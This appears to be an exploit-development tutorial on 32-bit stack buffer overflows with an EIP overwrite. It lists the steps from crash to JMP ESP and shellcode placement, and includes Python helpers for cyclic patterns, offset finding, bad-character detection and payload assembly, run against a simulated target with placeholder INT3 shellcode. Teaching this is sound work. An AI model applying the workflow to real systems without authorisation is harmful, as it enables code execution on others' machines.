Stack-based buffer overflows can be approached almost systematically when the target has no memory-corruption mitigations in place (no stack canaries, no DEP/NX, no ASLR). This post goes over the basic steps to execute a stack-based buffer overflow that achieves code execution through a 32-bit EIP overwrite.

Steps to Success

  1. Identify the buffer (input field, protocol command, file field) that overflows.
  2. Determine the length of input that causes the crash.
  3. Determine the offset within that input at which the instruction pointer (EIP) is overwritten, typically by sending a non-repeating pattern and locating the four bytes that land in EIP.
  4. Determine the bad characters that the target truncates on or mangles (0x00 is almost always one), so they can be kept out of the address, the NOP slide and the shellcode.
  5. Determine which register(s) point into our buffer at the time of the crash (commonly ESP).
  6. If no register gives direct access to our buffer, send a staged payload (for example a small first stage or egg hunter that locates the real shellcode in memory).
  7. Find a loaded module with the fewest memory protections (no ASLR, no SafeSEH, not rebased) and locate in it a JMP instruction to the register found in step 5 (for ESP, a JMP ESP).
  8. Overwrite EIP with the address of the JMP from step 7, written in little-endian byte order.
  9. Generate shellcode within the allotted restrictions (available space and the bad characters from step 4).
  10. Prepend a sufficiently long NOP slide to the shellcode, so that small variations in where the register points still land on executable filler that leads into the shellcode.
  11. Place the NOP slide and shellcode in the buffer at the location the register from step 5 points to, so that the JMP in step 7 lands on them.
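The steps above run end to end, as an added example that is not code from the original post. The target is a constructed Python model of a 32-bit stack frame that truncates input at 0x00 and 0x0a; the buffer size, the JMP ESP address and the placeholder INT3 shellcode are assumptions standing in for what a debugger, a module scan and msfvenom would give on a real target:

```python
"""Helpers for the EIP-overwrite steps above. Added example, not code from the
original post. The target is a constructed model of a 32-bit stack frame that
truncates input at 0x00 and 0x0a; it stands in for the crash and the memory
inspection a debugger would give, it is not a real vulnerable binary."""
import string

BUF_LEN = 96           # assumed size of the vulnerable local buffer (simulation only)
SAVED_EBP = 4          # saved frame pointer sits between the buffer and the return address
RET_OFF = BUF_LEN + SAVED_EBP
JMP_ESP = 0x625011AF   # hypothetical address of a JMP ESP in a non-ASLR module
SHELLCODE = b"\xcc" * 8  # stand-in for msfvenom output: INT3s so a debugger breaks here


def target_copy(data: bytes) -> bytes:
    """Simulated unsafe copy: a gets()-style read stops at NUL or newline, then
    everything read is copied onto the stack with no bounds check."""
    return data.split(b"\x00")[0].split(b"\n")[0]


def simulated_crash(stack: bytes):
    """Parse the overwritten frame: returns (EIP, bytes ESP points to after RET).
    EIP is loaded as a little-endian dword; ESP ends up just past the return address."""
    if len(stack) < RET_OFF + 4:
        return None, b""
    eip = int.from_bytes(stack[RET_OFF:RET_OFF + 4], "little")
    return eip, stack[RET_OFF + 4:]


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style non-repeating pattern Aa0Aa1...Zz9, cut to `length` bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset in the buffer of the 4 bytes that landed in EIP. The register value
    is reversed back into buffer order because x86 is little-endian."""
    idx = pattern.find(eip.to_bytes(4, "little"))
    if idx < 0:
        raise ValueError("EIP value %#x is not in the pattern" % eip)
    return idx


def badchar_string(exclude: bytes) -> bytes:
    """All 256 byte values minus the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def find_mangled(sent: bytes, seen: bytes):
    """First sent byte that was altered or dropped in memory, or None if all survived.
    Add it to the bad-char list and repeat until this returns None."""
    for s, m in zip(sent, seen):
        if s != m:
            return s
    if len(seen) < len(sent):  # truncated: the next byte we sent is the culprit
        return sent[len(seen)]
    return None


def build_exploit(offset, jmp_addr, shellcode, bad_chars, nop_len=16):
    """junk + EIP overwrite + NOP slide + shellcode; refuses bad chars in the
    two parts that cannot simply be padded away."""
    eip = jmp_addr.to_bytes(4, "little")
    for name, blob in (("JMP address", eip), ("shellcode", shellcode)):
        hit = set(blob) & set(bad_chars)
        if hit:
            raise ValueError(f"{name} contains bad char(s): {sorted(hit)}")
    return b"A" * offset + eip + b"\x90" * nop_len + shellcode


def run_workflow():
    """Steps 2-11 against the simulated target; returns what each step found."""
    # Steps 2-3: crash with a pattern, read EIP, recover the offset.
    pattern = cyclic_pattern(300)
    eip, _ = simulated_crash(target_copy(pattern))
    offset = pattern_offset(pattern, eip)
    # Step 4: iterate bad chars until the whole test string survives intact.
    bad = b"\x00"
    while True:
        probe = badchar_string(bad)
        hit = find_mangled(probe, target_copy(probe))
        if hit is None:
            break
        bad += bytes([hit])
    # Step 5: confirm ESP points at the bytes right after the return address.
    marker = b"B" * offset + b"C" * 4 + b"MARK"
    _, esp = simulated_crash(target_copy(marker))
    esp_hits_buffer = esp.startswith(b"MARK")
    # Steps 7-11: JMP ESP into EIP, NOP slide and shellcode where ESP points.
    payload = build_exploit(offset, JMP_ESP, SHELLCODE, bad)
    eip, esp = simulated_crash(target_copy(payload))
    return {"offset": offset, "bad_chars": bad, "esp_hits_buffer": esp_hits_buffer,
            "eip": eip, "lands_on_shellcode": esp.lstrip(b"\x90") == SHELLCODE}
```

Against a real target, `target_copy` and `simulated_crash` are replaced by a socket send and a look at the debugger: EIP comes from the register window, the bad-character comparison from a memory dump of the buffer, and the JMP ESP address from a scan of the loaded modules. The rest of the workflow stays the same.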